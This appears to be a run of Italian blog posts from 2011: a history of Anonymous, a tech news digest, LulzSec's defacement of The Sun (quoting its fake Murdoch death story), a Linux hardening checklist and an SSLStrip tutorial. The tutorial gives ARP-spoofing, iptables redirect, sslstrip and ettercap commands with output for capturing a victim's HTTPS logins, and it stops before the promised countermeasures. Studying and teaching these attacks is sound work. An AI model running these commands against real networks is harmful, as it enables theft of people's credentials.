Ultimamente mi ha incuriosito un movimento nato su Internet chiamato Anonymous. Il movimento nasce anni fa sulla piattaforma Imageboard di http://www.4chan.org/, dalla spontanea aggregazione di persone che commentavano la board /b/ firmandosi come Anonymous. Quel primo movimento caotico e multiculturale, è formato da numerose culture e idee ma una tra tutte prevale e che accomuna i suoi membri: “Cambiare il Mondo e renderlo più giusto”; favoloso, chi non ha mai avuto un desiderio simile, un po’ tutti penso. Questo movimento cresce e si diffonde in tutto il mondo, fino a diventare quello che è oggi, dai più definito superficialmente come un gruppo di hacker che compiono crimini, ma, secondo quello che ho visto fino ad ora, non è solo questo, c’è dell’altro.

Sviluppo del movimento

Le prime notizie di azioni rilevanti del movimento si hanno nel 2006, gli Hacktivisti di Anonymous si scagliano contro un parco divertimenti dell’Alabama reo di aver vietato a un bambino affetto di AIDS di immergersi in una piscina. Successivo è l’attacco al sito di un autore radio-fonico, Hal Turner, colpevole di sostenere la tesi della supremazia della razza bianca su tutte le altre. Nel Dicembre 2007 gli Hacktivisti di Anonymous smascherano il pedofilo Chris Forcand segnalandolo alla polizia e fornendo prove della sua compevolezza.

Nel 2008 gli Hacktivisti di Anonymous si organizzano per combattere la famigerata e temibile setta di Scientology. In questa occasione molti manifestanti si mascherano da Guy Fawkes temendo le ritorsioni della setta. La reazione di Scientology si fa sentire con azioni diffamatorie nei confronti di Anonymous, la setta defaccia un sito per ragazzini epilettici inserendo immagini in movimento che causano crisi firmandosi con il nome di Anonymous.

Il gruppo di Hacktivisti di Anonymous sostiene d’aver dato supporto informatico ai movimenti liberali dell’Iran, dello Zimbabwe, della Tunisia, dell’Egitto che poi sono sfociati nelle rivolte popolari atti a rovesciare i governi. In fine dando supporto agli Indignados spagnoli cavalcando il vento di anti-politica che sta nascendo in Europa.

Anonymous supporta e promuove i documenti di WikiLeaks. Attacca visa, paypal e altri istituti bancari quando essi decidono di non accettare più donazioni in favore di WikiLeaks.

Se volete approfondire l’aspetto storico, informazioni si trovano su wikipedia (presumibilmente scritte dagli stessi Anonymous): Anonymous, Imageboard.

Il concetto di Hacktivista

Attualmente, la maggior parte dei membri si definisce hacktivista e non hacker nel senso stretto del termine, la differenza è sottile e non di facile comprensione. Un hacktivista si definisce come un manifestante nel mondo digitale.

L’Hacktivista con la sola presenza su un sistema informatico esplica la sua funzione di protesta. Come tutti sanno quando un server ha un grosso numero di accessi incomincia a non funzionare bene, cioè inizia a razionalizzare le proprie risorse finché non fornirà più alcun dato. Finita la manifestazione di protesta gli hacktivisti abbandonano il server ed esso, senza alcun danno, inizia a fornire nuovamente dati.

Alcune volte tra gli hacktivisti si “intrufolano” veri e propri hackers che tentano di violare i sistemi informatici presi di mira, certamente è difficile capire se ci sono nessi tra gli hacktivisti e hackers.

Gli hacker del movimento

Questa possiamo dire che è la parte più estremista del movimento. Come tutti ben sanno, in Italia il movimento di Anonymous è diventato noto per gli attacchi, ad opera da parte di una corrente interna di hacker, verso alcuni siti web italiani e non:

• Enel.com, con la motivazione di “ancora una volta mostra di perseguire i propri interessi in modo indegno. Al fine di costruire impianti idroelettrici in Guatemala, nel municipio di Cotazal, l’Enel assolda (con i denari di tutti gli italiani) 500 mercenari in assetto di guerra con passamontagna e forze antisommossa per occupare la comunità indigena maya ixil di San Felipe Chenla, che dal 3 gennaio sta protestando contro la Enel” (fonte non più disponibile in quanto il sito che rivendicava l’attacco è stato oscurato);
• i siti web della sony e specialmente la piattaforma di gioco online, a quanto pare gli hacktivisti di Anonymous sostengono che i videogiochi rimbecilliscono le persone;
• molti siti governativi Statunitensi in quanto l’amministrazione americana ha arrestato l’hacker che ha fornito ad Assange i materiali riservati pubblicati su wikileaks;
• Paypal in quanto ha rifiutato di accettare donazioni in favore di wikileaks;
• molti siti delle università italiane per dimostrare alle stesse la fragilità dei loro sistemi;
• il sito dell’Agicom con la denuncia di “L’Agcom vorrebbe istituire una procedura veloce e puramente amministrativa di rimozione di contenuti online considerati in violazione della legge sul diritto d’autore.
  L’Autorità potrebbe sia irrogare sanzioni pecuniarie molto ingenti a chi non eseguisse gli ordini di rimozione, sia ordinare agli Internet Service Provider di filtrare determinati siti web in modo da renderli irraggiungibili dall’Italia. Il tutto senza alcun coinvolgimento del sistema giudiziario. Questa normativa dovrebbe entrare in vigore tra pochi giorni. Per questo chiediamo l’aiuto di tutti in questa protesta” contro misure che minano “alle fondamenta il diritto di avere una Rete libera e imparziale” fonte;
• i siti vicini al partito del Pdl, per la questione Agcom;
• il Cnaipic, ma questa è una storia controversa in quanto ci sono state prima delle rivendicazioni e poi delle smentite, però non si capisce la motivazione;

A quanto ho intuito, ma non lo posso dimostrare, il gruppo di hacker è alla ricerca di documenti “scottanti” che possono comprovare insabbiamenti e “la corruzione interna ai governi”, documenti che successivamente verranno usati per le altre fasi del loro piano.

Organizzazione

Facendo un analisi molto superficiale Anonymous sembra un movimento caotico e totalmente anarchico, ma cercando di capire ed analizzando un pochino si scopre che non è del tutto così. Navigando tra i canali della chat ho notato una struttura organizzata per temi e aree geografiche, fatta eccezione per il caotico canale italiano; sul canale italiano gli attacchi al canipic hanno attirato una moltitudine di persone in cerca di fama, perciò, è stato quasi impossibile riuscire a capire che cos’è Anonymous.

A quanto ho capito Anonymous non ha una gerarchia o una linea gerarchica, ma è formata da gruppi autogestiti che perseguono un obiettivo comune: “Cambiare il Mondo e renderlo più giusto”. In bocca al lupo!

L’intera organizzazione del movimento non è gestita in un unico sito ma è distribuita su una moltitudine di siti web, quelli che sono riuscito a rintracciare sono i seguenti:

• http://www.whatis-theplan.org, “Il piano per cambiare il mondo”;
• http://anonops.blogspot.com/;
• http://anonops-ita.blogspot.com/
• http://www.anonnewsnet.com/;
• http://anonnews.org/;
• http://www.whyweprotest.net/;
• http://hbgary.anonleaks.ch/;
• http://youranonnews.tumblr.com/;
• http://lulzsecurity.com/;
• http://anonplus.infiniteserve.com/;
• http://irc.lc/AnonOps/OpItaly , la chat italiana;
• tanti altri basta cercare su google o dai collegamenti dei siti citati.
• numerosi account su twitter, facebook e social network in genere…

Il piano per cambiare il mondo in un anno

Diciamo che è ambizioso come obiettivo. Per ora sono riuscito a trovare soltanto dei video su youtube, e “Il piano” è suddiviso in tre fasi dalla durata totale di un anno. La prima fase è iniziata il 15 Giugno 2011, presumibilmente è la fase di presentazione visto che stanno facendo tutto sto “baccano”. In che cosa consistano le altre due fasi non si riesce a capire in quanto nei video viene detto che “i dettagli saranno rilevati in seguito”. Ve ne propongo alcuni tra i più “folcroristici”:

Conclusioni

Diciamo che queste sono le prime impressioni che mi son fatto su Anonymous. Sono molto curioso su questo movimento, specialmente di capire se la storia “Del cambiare il Mondo” fino a quanto può essere vera, comunque, ci sono molti punti oscuri che non riesco a spiegare. Vedremo che succede.

Saluti.

PS Se a “qualcuno” non è piaciuto l’articolo e decide di attaccarmi, lo faccia pure, sicuramente riuscirà a fare danni; sono abbastanza conscio che la sicurezza assoluta non esiste. In questo articolo ho solo raccontato, liberamente, ciò che son riuscito a vedere e a conoscere.

Ecco un elenco di notizie degli ultimi due mesi che reputo interessanti per il modo informatico e le ripropongo ai lettori del blog. Gli argomenti spaziano da: rilascio del kernel linux 3.0, rilascio di vmware 5, SecureID violato, Ebay acquista Magento, Skype violato, Social Network, una notizia di un mese fa su Anonymous.

• E’ stato rilasciato il kernel linux 3.0 www.kernel.org . La mail originale di Linus Torvald che annuncia il rilascio del kernel 3.0 http://lwn.net/Articles/444314 .
• Rilasciato VmWare ESXi 5 http://suretalent.blogspot.com/2011/05/vmware-esxi-50-release-features-of.html
• Lockheed Martin RSA tra i più grandi produttori di armi al mondo violata, a quanto pare è stato duplicato un token RSA SecurID. http://www.pcmag.com/article2/0,2817,2386086,00.asp evento che rende pericolosa anche le transazioni online.
• Ebay acquista Magento http://www.magentocommerce.com/blog/ebay-agrees-to-acquire-magento
• Le chiamate su skype si possono intercettare http://www.scmagazine.com.au/News/258827,how-to-intercept-skype-calls.aspx grazie al reverse engineering del protocollo http://tech.slashdot.org/story/11/06/02/1914250/Skype-Protocol-Has-Been-Reverse-Engineered durato anni. Una possibile alternativa potrebbe essere http://www.fsf.org/blogs/community/skype-replacement-projects
• Anche gli hackers di Anonymous vogliono lanciare il loro Social Network, logicamente solo notizie in completo anonimato, forse non gli è andata giù l’estromissione da Google+ , oppure per uno spirito di concorrenza con il nuovo Social Network della Microsoft annunciato in modo maldestro http://www.socl.com/. Il social di Anonymous http://anonplus.com/ in questa pagina l’annuncio http://www.examiner.com/anonymous-in-national/anonplus-the-anti-social-networkhttp-anonplus-com
• E per ultimo una notizia vecchia, il 3 giugno 2011 il team di hackers Lulz Security diffonde online la configurazione del server web di nintendo.com dopo averlo violato, la ripropongo, magari a qualcuno interessa vedere come i grossi web server vengono configurati e gli errori che si fanno, prima però una massima di qualcuno che non ricordo il nome:

Chi non conosce gli errori della Storia, è destinato a ripeterli

configurazione server web nintendo.com

Saluti

In queste ore @LulzSec (19 Luglio 2011 ore 00:57 +1) con un attacco DDOS sta attaccando il giornale di Murdoch www.thesun.co.uk. Infatti se tentate di visualizzare la pagina http://www.thesun.co.uk/sol/homepage/ dopo pochi secondi verrete renderizzati su http://twitter.com/#!/LulzSec account twitter degli attaccanti.

Gli Hacker hanno messo su un articolo che è stato subito cancellato, ma ancora la pagina di thesun.co.uk renderizza sull’account twitter di LulzSec. L’attacco è stato annunciato con questo post su twitter:

We have joy we have fun we will mess up Murdoch’s Sun: http://t.co/JArvwg1 | Hi Rupert! Avere domani divertimento al Parlamento! # AntiSec Have fun tomorrow at the Parliament! #AntiSec

L’articolo che hanno messo su è il seguente:

Rupert Murdoch, the controversial media mogul, has reportedly been found dead in his garden, police announce.
Murdoch, aged 80, has said to have ingested a large quantity of palladium before stumbling into his famous topiary garden late last night, passing out in the early hours of the morning.
“We found the chemicals sitting beside a kitchen table, recently cooked,” one officer states. “From what we can gather, Murdoch melted and consumed large quantities of it before exiting into his garden.”

Chemicals found in house

Authorities would not comment on whether this was a planned suicide, though the general consensus among locals and unnamed sources is that this is the case.
One detective elaborates. “Officers on the scene report a broken glass, a box of vintage wine, and what seems to be a family album strewn across the floor, containing images from days gone by; some containing handpainted portraits of Murdoch in his early days, donning a top hat and monocle.”
Another officer reveals that Murdoch was found slumped over a particularly large garden hedge fashioned into a galloping horse. “His favourite”, a butler, Davidson, reports.
Butler Davidson has since been taken into custody for additional questioning.

Gli hacker sostengono di aver dirottato anche le mail. Del motivo di questo attacco non si capisce il perché, forse per gli ultimi avvenimenti? bho… o perché si vocifera nell’ambiente di quel fatto di tele+ e degli hacker assoldati per craccare le schede che hanno indebolito a livello economico l’emittente che successivamente è stata assorbita da Murdoch? oppure semplicemente un passatempo estivo…

Notte…

9:15 Aggiornamento: notizie sulla dinamica qua http://www.guardian.co.uk/technology/2011/jul/19/how-lulzsec-hacked-sun-website

Premesso che la sicurezza in modo assoluto non esiste, oggi affronteremo un argomento molto vasto e complesso l’hardening di un sistema linux, cioè come rendere più sicuro un sistema esposto sulla rete. In realtà non esiste una guida o “la guida” per mettere in sicurezza un sistema linux ma esistono delle regole per evitare che un sistema sia meno attaccabile. Inoltre, questa non vuole essere una guida esaustiva ma una specie di promemoria sulle operazioni da compiere appena installato un sistema linux.
Questo promemoria sull’hardening di un sistema linux è destinato a persone che hanno un po’ di esperienza su linux, particolari conoscenze o riti arcani non servono, basta conoscere un po’ il sistema che si intende modificare e i concetti base di linux, comunque, se ricopiate paro paro i comandi senza ragionare rischiate di rendere inaccessibile il vostro sistema.

Le partizioni e il filesystem

Come tutti sanno la radice del filesystem può essere su un unica partizione oppure articolata con diversi punti di montaggio. Come da molte guide che si possono trovare in giro per la rete è ormai assodato che le directory /tmp , /var , /usr e /home vanno montate in partizioni separate.

• Il punto di montaggio /tmp è pubblico, cioè tutti gli utenti devono avere la possibilità di scrivere, quindi, un aumento spropositato di questo punto di montaggio potrebbe mettere in crisi tutto il sistema se esso fosse su un’unica partizione. Non conviene montare questa partizione con l’opzione noexec poiché spesso alcuni software usano questa posizione per installare/aggiornare i pacchetti. Poi, se si è abbastanza paranoici come il sottoscritto, si può montare la partizione con l’opzione noexec, quando bisognerà fare manutenzione sul sistema /tmp verrà smontata e rimontata senza l’opzione noexec.
• Il punto di montaggio /var è altrettanto importante per quanto riguarda la sicurezza del sistema, specialmente per la presenza di /var/log, in esso vengonono salvati i log di sistema e in caso di un attacco DOS o un brute force potrebbe aumentare a dismisura. Questa partizione si può montare tranquillamente con l’opzione noexec.
• Il punto di montaggio /usr va montato in sola lettura, da smontare e rimontare in scrittura quando bisogna fare manutenzione al sistema.
• Per il punto di montaggio /home è buona cosa usare una partizione separata, per una serie infinita di motivi, tra i quali vi è la necessità di montare la partizione con l’opzione noexec. Questo si fa per evitare che un utente possa caricare un eseguibile bacato con l’intento di sfruttare lo stesso eseguibile per ottenere i privilegi di amministratore tramite shellcode.

Già queste impostazioni garantiscono una buona sicurezza, poi se si è abbastanza paranoici si può pensare di togliere il bit SUID/SGID da molti eseguibili non strettamente necessari, dipende da sistema a sistema. In caso si utilizza un sistema virtuale in remoto si potrebbe anche utilizzare le quote per settare le dimensioni massime che devono avere le cartelle.
Se siete sysadmin molto paranoici come il sottoscritto, subito dopo l’installazione del sistema ci si può calcolare hash di alcuni file sensibili: grep, ls, ps, netstat ecc; infatti, essi sono i primi che un probabile un attaccante modifica per nascondersi nel sistema. Per questa operazione è meglio usare MD5 e SHA1 al posto di MD2 e MD4 che sono algoritmi già violati (teoricamente anche l’MD5 è violabile ma solo in determinate condizioni che non rientrano nel nostro caso). Logicamente ad ogni aggiornamento bisogna ricalcolare gli hash, ci si può costruire facilmente uno script che faccia questo.

Utenti

Per un servizio che è costantemente esposto sulla rete i nomi utente giocano un ruolo molto importante se non fondamentale. Da molti bruteforce subiti, sicuramente da parte di bot che scansionano la rete alla ricerca di sistemi vulnerabili, i nome utente più attaccati sono: root, admin, administrator, testing, spam, postgres, ftpuser, user, newsletter, fax, ftp, office, training, demo, oracle, master, contact, staff, sales, backup, info, test, marketing, smtp, bob, windows, webmaster, mysql, anonymous, guest, ecc., quindi di conseguenza utilizzare questi nome utente per i servizi non è un’idea molto buona, usare questi username si semplifica del 50% il compito di un eventuale attaccante.
Una buona soluzione è quella di utilizzare per i nome utente regole simili quelle delle passwords o quasi. Per esempio, all’utente Mario Rossi si potrebbe impostare un nome utente tipo “MarioRossi123z” oppure “mrossi56ScF” e così via. La stesso concetto si può estendere anche agli accessi ftp o mail se si fornisce un servizio di hosting o simili.
Vietare l’accesso ssh agli utenti e non permettere l’utilizzo di shell, altrimenti un utente malintenzionato potrebbe compilare o caricare un eseguibile con un bug costruito ad hoc e attraverso esso ottenere i privilegi di root. Impostando la partizione /home con noexec, vietando agli utenti l’utilizzo di shell e dei compilatori possiamo stare relativamente tranquilli.

Volendo essere paranoici ci si può costruire uno script che analizza ogni ora o mezzora i log di sistema e ad un tot numero di login falliti da parte di un ip metta in banlist lo stesso. Ci si può inventare un pò di tutto, basta un pò di fantasia.

Servizi

I servizi senza ombra di dubbio sono la via d’accesso dei nostri potenziali intrusi, dire che bisogna mantenere aggiornato il software è abbastanza scontato, quindi, la prima regola è un update di sicurezza giornaliero.
La scelta migliore che si possa fare è chiudere tutti i servizi che non ci servono e rinforzare quelli che offriamo. Come prima cosa eliminare totalmente telnet e simili, se per caso sono installati, ma ormai neanche nelle installazioni di default ci stanno sti servizi. Successivamente controlliamo quali servizi sono aperti digitando da terminale:

netstat -t -u -l

oppure se preferiamo il numero delle porte

netstat -t -u -l --numeric-ports

dovremmo ottenere un output simile a questo

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address      Foreign Addr  State
tcp        0      0 *:pop3s                *:*       LISTEN
tcp        0      0 *:mysql                *:*       LISTEN
tcp        0      0 *:pop3                 *:*       LISTEN
tcp        0      0 *:imap                 *:*       LISTEN
tcp        0      0 localhost.locald:domain*:*       LISTEN
tcp        0      0 *:smtp                 *:*       LISTEN
tcp        0      0 *:imaps                *:*       LISTEN
tcp        0      0 *:http                 *:*       LISTEN
tcp        0      0 *:domain               *:*       LISTEN
tcp        0      0 *:ftp                  *:*       LISTEN
tcp        0      0 *:https                *:*       LISTEN
tcp        0      0 *:ssh                  *:*       LISTEN
udp        0      0 localhost.locald:domain*:*
udp        0      0 localhost.locald:domain*:*
udp        0      0 *:36593                *:*
udp        0      0 *:domain               *:*

Vediamo dove intervenire

Mettere in sicurezza SSH

Come detto in precedenza solo gli admin o l’admin dovrebbe essere abilitato a questo accesso, gli altri utenti non devono poter accedere a questo servizio. Inoltre, molto importante è disabilitare l’accesso all’utente root, i privilegi di superutente verranno acquisiti dagli admin tramite il comando su.
Apriamo il file /etc/ssh/sshd_config con un editor, per disabilitare l’accesso a root, lasciare l’accesso solo ad alcuni utenti e vietare l’uso di password vuote, modificare come segue le seguenti linee

PermitRootLogin no
AllowUsers pincopallino, secondopinco
PermitEmptyPasswords no

Una buona idea è cambiare la porta predefinita del servizio e forzare l’utilizzo del protocolo 2

Port 65000
Protocol 2

eventualmente per impedire l’utilizzo di sftp commentare la riga

#Subsystem    sftp    /usr/libexec/openssh/sftp-server

eventualmente se si volesse modificare il banner di presentazione del servizio, prima bisogna de-commentare la seguente riga e successivamente impostare una path dove salvare un file di testo con il banner

#Banner /some/path

modificato tutto, bisogna riavviare il servizio sshd stando attenti a non fare alcun errore, se si opera in remoto si rischia di autoescludersi dal sistema.

In caso la paranoia si fa sentire, si può abilitare l’accesso a ssh soltanto in possesso di una chiave crittografica impostando nel file di configurazione

PubkeyAuthentication yes

successivamente bisognerà generare una chiave privata e una pubblica per ogni utente a cui si vuole dare l’accesso, maggiori informazioni su http://sial.org/howto/openssh/publickey-auth o http://www.openssh.com, l’accesso si effettua soltanto con la chiave e non verrà richiesta alcuna password.
Inoltre, possiamo fare in modo che ogni utente loggato lavori in un abiente simile ad un sistema linux ma limitato di alcuni comandi utilizzando un fake chroot, oppure, possiamo prevedere l’apertura della porta ssh con il port knocking (la classica bussata segreta) per queste e altre tecniche rimando sempre al sito ufficiale di openssh, altrimenti questo articolo diventerebbe troppo lungo.

Gli altri servizi

Secondo il mio punto di vista sono da prediligere pop3s, smtps e imaps e da chiudere pop3, smtp e imap a meno che non abbiate degli utenti che li utilizzano, in tal caso bisognerà costruire una specie di piano d’uscita da questi servizi obsoleti.

Limitare un SYN Flood

Questo era un attacco DOS molto comune alla fine del secolo scorso, le recenti impostazioni di rete tendono a limitare o annullare del tutto questo tipo di attacco. L’attacco tende a saturare le risorse di sistema, una descrizione dell’attacco la si può trovare su http://www.cert.org/advisories/CA-1996-21.html . Per limare ulteriolmente le impostazioni di sicurezza rispetto a quelle della vostra rete si possono utlizzare i SYN cookies, essi limitano il numero di richieste da parte di un singolo utente. Aprire il file /etc/sysctl.conf (è un file di configurazione del kernel) ed editare le seguenti linee

#Prevent SYN attack
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = xxx
net.ipv4.tcp_synack_retries = 2

e le successive linee per la protezione contro l’IP Spoofing

# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1

poi se si desidera configurare la distribuzione come un firewall possiamo utilizzare la configurazione proposta da http://openskill.info/infobox.php?ID=1166

net.ipv4.ip_forward = 1
net.ipv4.ip_dynaddr = 1
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_sack = 0
net.ipv4.tcp_timestamps = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_fin_timeout = 30
net.ipv4.tcp_window_scaling = 0
net.ipv4.tcp_syn_retries = 3
net.ipv4.tcp_synack_retries = 3
net.ipv4.conf.default.rp_filter = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.log_martians = 1
net.ipv4.conf.all.rp_filter = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.log_martians = 1
kernel.printk = 1 4 1 7
##
net.ipv4.tcp_max_syn_backlog=1280
net.ipv4.conf.all.send_redirects=0
net.ipv4.conf.all.forwarding=0
net.ipv4.conf.all.mc_forwarding=0
net.ipv4.vs.timeout_timewait=60

Conclusioni

Secondo il mio punto di vista questo è il minimo sindacale per mettere in sicurezza il nostro sistema esposto ai rischi della rete. Certo l’hardening non finisce qua, anzi, questa è solo la punta dell’iceberg, è compito di ogni sistemista documentarsi e apprendere giorno per giorno nuove tecniche, anche tentando di violare i propri sistemi per saggiarne la sicurezza.

In rete si trovano numerosi script che ci aiutano in questo compito, magari in un prossimo futuro farò un articolo in merito.

Saluti

Oggi si parla di sicurezza informatica, o di insicurezza informatica dipende dai punti di vista. SSL Strip è una tecnica presentata al Black Hat DC del 2009 che rientra nella categoria dei MITM (Main in the middle). All’interno di una rete LAN, questa tecnica permette di sniffare le password provenienti da un server sicuro, HTTPS per fare un esempio. Questa tecnica risulta molto pericolosa, in quanto, se un malintenzionato riuscisse ad entrare in una qualsiasi rete LAN o rete wireless (abitazione, ufficio, ecc) potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook, twitter, instantempo e perfino i dati bancari. La tecnica, a grandi linee, molto semplicemente, consiste nel far in modo che il computer dell’attaccante si metta in mezzo tra il computer della vittima e il router, il computer dell’attaccante diventa un “nodo invisibile” su cui vengono veicolate tutte le informazioni. A fine articolo si abbozzeranno delle soluzioni al problema.

Configurazione di SSL Strip

Il sistema che userò per configurare gli script e i programmi è Ubuntu 10.4, per diversi motivi: i sorgenti e i comandi sono progettati per un sistema Linux; su un altro sistema non si possono fare tutte le modifiche che ci si propone di fare; sono molti anni che uso Ubuntu e lo conosco fin nei minimi particolari.

La prima operazione da fare è scaricare SSLStrip da: http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

Scompattare il pacchetto, utilizzare “tar -zxvf sslstrip-0.4.tar.gz” se si sta operando da terminale.

arturu@arturu-laptop:~/Scrivania$ tar -zxvf sslstrip-0.7.tar.gz
sslstrip-0.7/
sslstrip-0.7/setup.py
sslstrip-0.7/README
sslstrip-0.7/COPYING
sslstrip-0.7/lock.ico
sslstrip-0.7/sslstrip/
sslstrip-0.7/sslstrip/StrippingProxy.py
sslstrip-0.7/sslstrip/URLMonitor.py
sslstrip-0.7/sslstrip/ServerConnectionFactory.py
sslstrip-0.7/sslstrip/__init__.py
sslstrip-0.7/sslstrip/ServerConnection.py
sslstrip-0.7/sslstrip/ClientRequest.py
sslstrip-0.7/sslstrip/SSLServerConnection.py
sslstrip-0.7/sslstrip/CookieCleaner.py
sslstrip-0.7/sslstrip.py
arturu@arturu-laptop:~/Scrivania$

Il file compresso viene estratto in una cartella, entrare nella cartella e compilare il codice sorgente con “python setup.py build” (è necessario avere installato l’interprete python)

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ python setup.py build
running build
running build_py
creating build
creating build/lib.linux-i686-2.6
creating build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/StrippingProxy.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/__init__.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/SSLServerConnection.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ServerConnectionFactory.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/ClientRequest.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/URLMonitor.py -> build/lib.linux-i686-2.6/sslstrip
copying sslstrip/CookieCleaner.py -> build/lib.linux-i686-2.6/sslstrip
running build_scripts
creating build/scripts-2.6
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
changing mode of build/scripts-2.6/sslstrip from 644 to 755
Cleaning up...
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Successivamente bisogna installare tutto con il comando “sudo python setup.py install”

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo python setup.py install
[sudo] password for arturu:
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.6.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.6.egg-info
Cleaning up...
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Appena installato SSLStrip, bisogna procedere all’installazione di arpspoof. Arpspoof è un programma che fa credere ad un host (computer della vittima) che l’indirizzo MAC dell’attaccante è l’indirizzo MAC del router (contaminando i pacchetti arp, ma questo è un altro discorso), così facendo la vittima inizia ad inviare all’attaccante tutto il suo traffico di rete; il kernel dell’attaccante, ad eccezione per il traffico destinato alla porta 80, reindirizza tutto a $ listenPort (10000, per esempio).

Installiamo arpspoof con il comando “sudo apt-get install dsniff” e successivamente installiamo Ettercap (altro famoso tool per la cattura dei pacchetti) con il comando “sudo apt-get install ettercap”.

Adesso che abbiamo installato tutto il software si può passare all’utilizzo.

Utilizzo di SSLStrip

Da ora in poi facciamo finta che noi siamo gli attaccanti e Mario sia la nostra vittima. Come prima cosa bisogna conoscere il nostro indirizzo ip all’interno della rete LAN, da terminale digitiamo “ifconfig”

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ ifconfig
eth0    Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:0 (0.0 B)  Byte TX:0 (0.0 B)
          Interrupt:21
wlan0  Link encap:Ethernet  HWaddr 00:00:00:00:00:00
          indirizzo inet:10.10.100.5  Bcast:10.10.100.255  Maschera:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:41373 errors:0 dropped:0 overruns:0 frame:0
          TX packets:44774 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:27814338 (27.8 MB)  Byte TX:10429284 (10.4 MB)
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Dopo la voce HWaddr abbiamo il nostro indirizzo MAC e dopo inet il nostro indirizzo ip nella rete interna. In questo caso nella mia rete interna ho il seguente indirizzo ip 10.10.100.5 sull’interfaccia wireless, l’ethernet è disattivata; il mio MAC address è 00:00:00:00:00:00 (l’ho modificato perché non mi va di pubblicarlo).

Bisogna trovare l’indirizzo del gateway, è necessario che esso sia uguale a quello della vittima, situazione che si verifica nel 90% dei casi, digitiamo da terminale ” ip route show | grep default | awk ‘{ print $3}’ “

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ ip route show | grep default | awk '{ print $3}'
10.10.100.254
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

in questo caso l’indirizzo del gateway è 10.10.100.254.
Successivamente bisogna aprire tre diverse schede nella finestra del terminale, perché abbiamo bisogno di eseguire tre comandi in parallelo.
Nel primo tab eseguire “sudo arpspoof -t 10.10.100.2 10.10.100.254″, dove il primo indirizzo ip è quello della vittima e il secondo è il gateway (per trovare gli indirizzi dei computer connessi nella LAN basta utilizzare un qualsiasi scanner di rete), il risultato è simile al seguente (ho modificato i MAC address) praticamente ogni pacchetto della vittima in ogni instantempo viene fatto passare attraverso il nostro computer e inviato al router vero, e viceversa.

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo arpspoof -t 10.10.100.2 10.10.100.254
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00
00:00:00:00:00:00 0:0:0:0:0:0 0806 42: arp reply 10.10.100.254 is-at 00:00:00:00:00:00

Nella seconda scheda eseguiamo il comando “iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 1000″, serve a renderizzare le richieste dalla porta 80 alla porta 1000 del nostro computer (la porta di destinazione la possiamo cambiare a piacere, in caso fosse già utilizzata da un altro servizio).

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$

Subito dopo facciamo partire “sslstrip” e si lascia in esecuzione

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sslstrip
sslstrip 0.6 by Moxie Marlinspike running...

Nella terza tab facciamo partire ettercap in sniff mode con il seguente comando “sudo ettercap -Tqz”, aspettiamo che la nostra vittima digiti login e password su una connessione “sicura”, il risultato dovrebbe essere il seguente (ho modificato il mio MAC address)

arturu@arturu-laptop:~/Scrivania/sslstrip-0.7$ sudo ettercap -Tqz
[sudo] password for arturu:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan... (Wireless)
